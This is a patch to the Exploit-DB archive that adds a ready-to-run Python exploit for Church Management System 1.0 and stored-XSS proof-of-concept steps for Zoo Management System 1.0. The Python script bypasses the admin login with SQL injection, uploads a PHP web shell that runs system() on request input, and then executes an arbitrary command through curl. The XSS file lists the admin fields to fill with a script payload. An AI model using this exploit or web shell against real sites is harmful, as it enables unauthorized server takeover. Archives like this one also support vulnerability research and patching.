From efd4a69880a2f7540442356f3aef233769b1e6a1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 10 Jul 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-07-10

3 changes to exploits/shellcodes

Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
---
 exploits/php/webapps/50116.py    | 56 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/50117.txt   | 45 +++++++++++++++++++++++++
 exploits/windows/local/50083.txt |  1 +
 files_exploits.csv               |  2 ++
 4 files changed, 104 insertions(+)
 create mode 100755 exploits/php/webapps/50116.py
 create mode 100644 exploits/php/webapps/50117.txt

diff --git a/exploits/php/webapps/50116.py b/exploits/php/webapps/50116.py
new file mode 100755
index 000000000..b43d08e7a
--- /dev/null
+++ b/exploits/php/webapps/50116.py
@@ -0,0 +1,56 @@
+# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE
+# Date: 05-07-2021
+# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com)
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
+# Version: 1.0
+# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu)
+
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+import random
+import os, sys
+import argparse
+import optparse
+import string
+
+if len(sys.argv)!=5:
+    print('Usage: -u http://<ip> -c <"command">')
+    print('ex. python3 http://192.168.1.2 -c "ls+-la"')
+    exit()
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url")
+parser.add_option('-c', '--cmd', action="store", dest="cmd")
+options,args=parser.parse_args()
+
+print(options.url, options.cmd)
+print(len(sys.argv))
+
+def randomGen(size=8, chars=string.ascii_lowercase):
+    return ''.join(random.choice(chars) for _ in range(size))
+
+urlbase=options.url+'/cman/admin';
+loginUrl=urlbase+'/index.php';
+
+shellFile=randomGen()+".php"
+
+payload={"username":"test", "password":"' or 'a'='a'#", "login":""};
+
+proxies = { "http": "http://localhost:8080"}
+
+mp_encoder = MultipartEncoder(fields = {
+    "image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),
+    "change":""})
+
+session=requests.Session()
+r=session.post(loginUrl, payload, allow_redirects=False) #, proxies=proxies)
+cookie=r.headers["Set-Cookie"]
+
+headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type}
+
+uploadUrl=urlbase+"/admin_pic.php"
+
+post=session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies)
+
+os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd)
\ No newline at end of file
diff --git a/exploits/php/webapps/50117.txt b/exploits/php/webapps/50117.txt
new file mode 100644
index 000000000..5640dc3da
--- /dev/null
+++ b/exploits/php/webapps/50117.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
+# Date: 08/07/2021
+# Exploit Author: Subhadip Nag
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Server: XAMPP
+
+# Description #
+
+Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/ZMSP/zms/admin/index.php  and  Login(given User & password)
+2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
+3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
+4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
+5) Stored XSS payload is fired
+
+6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
+7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
+8) Go back and again click 'Manage Type Ticket'
+9) Stored XSS payload is fired
+
+10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php 
+11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update
+
+12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
+13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update 
+14) Logout and click 'Back Home'
+15) Our XSS payload successful
+  
+
+# Image PoC : Reference Image #
+
+1) https://ibb.co/g4hFQDV
+2) https://ibb.co/frbpf9c
+3) https://ibb.co/NtKrc9C
+4) https://ibb.co/cFGWhCz
+4) https://ibb.co/CMXmN4f
+5) https://ibb.co/C0dV0PC
+6) https://ibb.co/4ZW8tb3
+7) https://ibb.co/3zgFq9b
+8) https://ibb.co/wS8wXj8
\ No newline at end of file
diff --git a/exploits/windows/local/50083.txt b/exploits/windows/local/50083.txt
index ffce49ae1..1b8a31b12 100644
--- a/exploits/windows/local/50083.txt
+++ b/exploits/windows/local/50083.txt
@@ -4,6 +4,7 @@
 # Vendor Homepage: http://nica.it - http://winwastenet.com
 # Version: 1.0.6183.16475
 # Tested on: Windows 10 Pro x64 - 20H2 and 21H1
+# CVE: CVE-2021-34110
 
 WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
 
diff --git a/files_exploits.csv b/files_exploits.csv
index efcf9f0c4..641595811 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44253,3 +44253,5 @@ id,file,description,date,author,type,platform,port
 50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,
 50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",2021-07-08,faisalfs10x,webapps,php,
 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php,
+50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,
+50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)",2021-07-09,"Subhadip Nag",webapps,php,